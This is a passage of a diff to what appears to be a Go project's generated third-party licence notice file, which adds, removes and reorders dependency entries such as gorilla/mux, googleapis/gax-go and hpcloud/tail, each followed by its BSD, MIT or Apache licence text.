BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - - --------------------------------------------------------------------------------- -Dependency : github.com/google/go-querystring -Version: v1.0.0 -Licence type (autodetected): BSD-3-Clause --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/google/go-querystring@v1.0.0/LICENSE: - -Copyright (c) 2013 Google. All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright -notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above -copyright notice, this list of conditions and the following disclaimer -in the documentation and/or other materials provided with the -distribution. - * Neither the name of Google Inc. nor the names of its -contributors may be used to endorse or promote products derived from -this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - - --------------------------------------------------------------------------------- -Dependency : github.com/google/gofuzz -Version: v1.1.0 -Licence type (autodetected): Apache-2.0 --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/google/gofuzz@v1.1.0/LICENSE: - - - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. @@ -30973,12 +30630,49 @@ Contents of probable licence file $GOMODCACHE/github.com/google/shlex@v0.0.0-201 -------------------------------------------------------------------------------- -Dependency : github.com/google/subcommands -Version: v1.0.1 +Dependency : github.com/googleapis/gax-go/v2 +Version: v2.0.5 +Licence type (autodetected): BSD-3-Clause +-------------------------------------------------------------------------------- + +Contents of probable licence file $GOMODCACHE/github.com/googleapis/gax-go/v2@v2.0.5/LICENSE: + +Copyright 2016, Google Inc. +All rights reserved. +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + + +-------------------------------------------------------------------------------- +Dependency : github.com/googleapis/gnostic +Version: v0.4.1 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/google/subcommands@v1.0.1/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/googleapis/gnostic@v0.4.1/LICENSE: Apache License @@ -31184,16 +30878,17 @@ Contents of probable licence file $GOMODCACHE/github.com/google/subcommands@v1.0 limitations under the License. + -------------------------------------------------------------------------------- -Dependency : github.com/googleapis/gax-go/v2 -Version: v2.0.5 -Licence type (autodetected): BSD-3-Clause +Dependency : github.com/gopherjs/gopherjs +Version: v0.0.0-20181017120253-0766667cb4d1 +Licence type (autodetected): BSD-2-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/googleapis/gax-go/v2@v2.0.5/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/gopherjs/gopherjs@v0.0.0-20181017120253-0766667cb4d1/LICENSE: + +Copyright (c) 2013 Richard Musiol. All rights reserved. -Copyright 2016, Google Inc. -All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: @@ -31204,9 +30899,6 @@ notice, this list of conditions and the following disclaimer. copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. - * Neither the name of Google Inc. nor the names of its -contributors may be used to endorse or promote products derived from -this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT @@ -31222,326 +30914,79 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- -Dependency : github.com/googleapis/gnostic -Version: v0.4.1 -Licence type (autodetected): Apache-2.0 +Dependency : github.com/gorilla/mux +Version: v1.7.2 +Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/googleapis/gnostic@v0.4.1/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/gorilla/mux@v1.7.2/LICENSE: +Copyright (c) 2012-2018 The Gorilla Authors. All rights reserved. - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. - 1. Definitions. +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. +-------------------------------------------------------------------------------- +Dependency : github.com/gorilla/websocket +Version: v1.4.1 +Licence type (autodetected): BSD-2-Clause +-------------------------------------------------------------------------------- - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. +Contents of probable licence file $GOMODCACHE/github.com/gorilla/websocket@v1.4.1/LICENSE: - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. +Copyright (c) 2013 The Gorilla WebSocket Authors. All rights reserved. - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. + Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). + Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright [yyyy] [name of copyright owner] - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - - - --------------------------------------------------------------------------------- -Dependency : github.com/gopherjs/gopherjs -Version: v0.0.0-20181017120253-0766667cb4d1 -Licence type (autodetected): BSD-2-Clause --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/gopherjs/gopherjs@v0.0.0-20181017120253-0766667cb4d1/LICENSE: - -Copyright (c) 2013 Richard Musiol. All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright -notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above -copyright notice, this list of conditions and the following disclaimer -in the documentation and/or other materials provided with the -distribution. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - - --------------------------------------------------------------------------------- -Dependency : github.com/gorilla/mux -Version: v1.7.2 -Licence type (autodetected): BSD-3-Clause --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/gorilla/mux@v1.7.2/LICENSE: - -Copyright (c) 2012-2018 The Gorilla Authors. All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright -notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above -copyright notice, this list of conditions and the following disclaimer -in the documentation and/or other materials provided with the -distribution. - * Neither the name of Google Inc. nor the names of its -contributors may be used to endorse or promote products derived from -this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - - --------------------------------------------------------------------------------- -Dependency : github.com/gorilla/websocket -Version: v1.4.1 -Licence type (autodetected): BSD-2-Clause --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/gorilla/websocket@v1.4.1/LICENSE: - -Copyright (c) 2013 The Gorilla WebSocket Authors. All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are met: - - Redistributions of source code must retain the above copyright notice, this - list of conditions and the following disclaimer. - - Redistributions in binary form must reproduce the above copyright notice, - this list of conditions and the following disclaimer in the documentation - and/or other materials provided with the distribution. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE -FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL -DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER -CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, -OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - - --------------------------------------------------------------------------------- -Dependency : github.com/gregjones/httpcache -Version: v0.0.0-20180305231024-9cad4c3443a7 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- +-------------------------------------------------------------------------------- +Dependency : github.com/gregjones/httpcache +Version: v0.0.0-20180305231024-9cad4c3443a7 +Licence type (autodetected): MIT +-------------------------------------------------------------------------------- Contents of probable licence file $GOMODCACHE/github.com/gregjones/httpcache@v0.0.0-20180305231024-9cad4c3443a7/LICENSE.txt: @@ -34417,122 +33862,17 @@ Exhibit B - “Incompatible With Secondary Licenses” Notice -------------------------------------------------------------------------------- -Dependency : github.com/haya14busa/go-actions-toolkit -Version: v0.0.0-20200105081403-ca0307860f01 +Dependency : github.com/hpcloud/tail +Version: v1.0.0 Licence type (autodetected): MIT -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/haya14busa/go-actions-toolkit@v0.0.0-20200105081403-ca0307860f01/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/hpcloud/tail@v1.0.0/LICENSE.txt: -MIT License +# The MIT License (MIT) -Copyright (c) 2020 haya14busa - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - ---- - -https://github.com/actions/toolkit - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - - --------------------------------------------------------------------------------- -Dependency : github.com/haya14busa/go-checkstyle -Version: v0.0.0-20170303121022-5e9d09f51fa1 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/haya14busa/go-checkstyle@v0.0.0-20170303121022-5e9d09f51fa1/LICENSE: - -MIT License - -Copyright (c) 2016 haya14busa - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - --------------------------------------------------------------------------------- -Dependency : github.com/haya14busa/secretbox -Version: v0.0.0-20180525171038-07c7ecf409f5 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/haya14busa/secretbox@v0.0.0-20180525171038-07c7ecf409f5/LICENSE: - -MIT License - -Copyright (c) 2018 haya14busa - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - --------------------------------------------------------------------------------- -Dependency : github.com/hpcloud/tail -Version: v1.0.0 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/hpcloud/tail@v1.0.0/LICENSE.txt: - -# The MIT License (MIT) - -# © Copyright 2015 Hewlett Packard Enterprise Development LP -Copyright (c) 2014 ActiveState +# © Copyright 2015 Hewlett Packard Enterprise Development LP +Copyright (c) 2014 ActiveState Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal @@ -34932,36 +34272,6 @@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. --------------------------------------------------------------------------------- -Dependency : github.com/justinas/nosurf -Version: v1.1.0 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/justinas/nosurf@v1.1.0/LICENSE: - -The MIT License (MIT) - -Copyright (c) 2013 Justinas Stankevicius - -Permission is hereby granted, free of charge, to any person obtaining a copy of -this software and associated documentation files (the "Software"), to deal in -the Software without restriction, including without limitation the rights to -use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of -the Software, and to permit persons to whom the Software is furnished to do so, -subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY 